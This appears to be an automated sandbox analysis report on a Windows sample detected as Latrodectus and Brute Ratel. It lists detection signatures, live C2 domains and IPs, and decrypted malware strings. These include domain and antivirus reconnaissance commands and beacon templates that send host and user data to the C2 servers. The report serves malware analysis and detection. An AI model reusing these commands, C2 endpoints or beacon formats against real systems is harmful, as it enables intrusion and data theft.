Windows Analysis Report
wait.dll.dll

Overview

General Information

Sample name: wait.dll.dll
(renamed file extension from exe to dll)
Original sample name: wait.dll.exe
Analysis ID: 1566852
MD5: 50bd4ff60c931861e46c801a60f9e916
SHA1: 13b14fb516fa726cc5fa9af17a2f93ff49449830
SHA256: f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
Tags: exe, TA578, user-k3dg3___

Detection

BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Uses whoami command line tool to query computer and username
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapter information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Brute Ratel C4, BruteRatel Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
Latrodectus, Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

AV Detection

Source: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54 Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/ Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560D Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767 Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/t60G Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/X Avira URL Cloud: Label: malware
Source: https://reateberam.com/ Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/w Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bino Avira URL Cloud: Label: malware
Source: https://reateberam.com/q Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50 Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4560 Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binSL Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19 Avira URL Cloud: Label: malware
Source: https://reateberam.com/p Avira URL Cloud: Label: malware
Source: 8.2.explorer.exe.3030000.0.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c ipconfig /all
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c systeminfo
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c nltest /domain_trusts
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c net view /all
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c net view /all /domain
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &ipconfig=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c net config workstation
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /c whoami /groups
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &systeminfo=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &domain_trusts=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &domain_trusts_all=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &net_view_all_domain=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &net_view_all=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &net_group=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &wmic=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &net_config_ws=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &net_wmic_av=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &whoami_group=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &proclist=[
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "pid":
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "%d",
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "proc":
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "%s",
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "subproc": [
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &desklinks=[
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: *.*
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "%s"
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Update_%x
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Custom_update
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: .dll
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: .exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Error
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: runnung
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %s/%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: front
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: /files/
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Lambda
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Cookie:
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: POST
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: GET
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: curl/7.88.1
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: CLEARURL
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: URLS
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: COMMAND
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: ERROR
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: [{"data":"
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: "}]
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &dpost=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: https://reateberam.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: https://dogirafer.com/test/
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: \*.dll
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: AppData
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Desktop
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Startup
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Personal
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Local AppData
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: <html>
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: <!DOCTYPE
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %s%d.dll
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Content-Length: 0
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Content-Type: application/dns-message
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: Content-Type: application/ocsp-request
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: 12345
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &stiller=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %s%d.exe
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %x%x
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &mac=
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %02x
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: :%02x
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &computername=%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: &domain=%s
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: LogonTrigger
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: \Registry\Machine\
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: TimeTrigger
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: PT0H%02dM
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: PT0S
Source: 8.2.explorer.exe.3030000.0.unpack String decryptor: \update_data.dat
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7AC00 CryptStringToBinaryA,swprintf,LocalAlloc,swprintf,CryptStringToBinaryA,swprintf,CryptDecodeObjectEx,swprintf,LocalAlloc,swprintf,CryptDecodeObjectEx,swprintf,CryptImportPublicKeyInfoEx2,swprintf,LocalAlloc,swprintf,swprintf,swprintf,BCryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_00007FF8A8D7AC00
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7CEB0 BCryptOpenAlgorithmProvider,swprintf,BCryptGetProperty,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptExportKey,swprintf, 3_2_00007FF8A8D7CEB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7C3D0 BCryptOpenAlgorithmProvider,swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,swprintf,swprintf,swprintf,GetProcessHeap,HeapFree,BCryptDestroyHash,BCryptCloseAlgorithmProvider, 3_2_00007FF8A8D7C3D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7B720 swprintf,swprintf,GetProcessHeap,HeapAlloc,swprintf,BCryptDecrypt,swprintf,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,BCryptDestroyKey, 3_2_00007FF8A8D7B720
Source: C:\Windows\explorer.exe Code function: 8_2_0E455E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree, 8_2_0E455E5C
Source: C:\Windows\explorer.exe Code function: 8_2_0E455FE4 CryptUnprotectData, 8_2_0E455FE4
Source: C:\Windows\explorer.exe Code function: 8_2_0E515C60 CryptUnprotectData, 8_2_0E515C60
Source: C:\Windows\explorer.exe Code function: 8_2_0E458568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree, 8_2_0E458568
Source: C:\Windows\explorer.exe Code function: 8_2_0E45453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey, 8_2_0E45453C
Source: C:\Windows\explorer.exe Code function: 8_2_0E456078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree, 8_2_0E456078
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: wait.dll.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose, 3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0303A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03032B28
Source: C:\Windows\explorer.exe Code function: 8_2_030404C0 FindFirstFileW, 8_2_030404C0
Source: C:\Windows\explorer.exe Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0838A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_083904C0 FindFirstFileW, 8_2_083904C0
Source: C:\Windows\explorer.exe Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_08382B28
Source: C:\Windows\explorer.exe Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0885A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_088604C0 FindFirstFileW, 8_2_088604C0
Source: C:\Windows\explorer.exe Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_08852B28
Source: C:\Windows\explorer.exe Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_0E456604
Source: C:\Windows\explorer.exe Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0E4516F4
Source: C:\Windows\explorer.exe Code function: 8_2_0E515C40 FindFirstFileW,FindClose, 8_2_0E515C40
Source: C:\Windows\explorer.exe Code function: 8_2_0E4F50D8 FindFirstFileA, 8_2_0E4F50D8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize, 8_2_0E4F5088

Networking

Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49928 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49941 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49922 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49972 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50009 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50007 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50000 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49999 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49986 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50001 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50013 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50015 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50002 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49980 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50014 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49962 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50010 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50021 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50003 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50025 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50011 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50019 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50018 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50030 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50032 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50017 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50026 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50036 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50008 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50023 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50033 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50039 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50037 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50006 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49995 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49916 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50035 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50024 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49934 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50034 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49907 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50038 -> 104.21.68.89:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50020 -> 172.67.217.190:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50027 -> 172.67.217.190:443
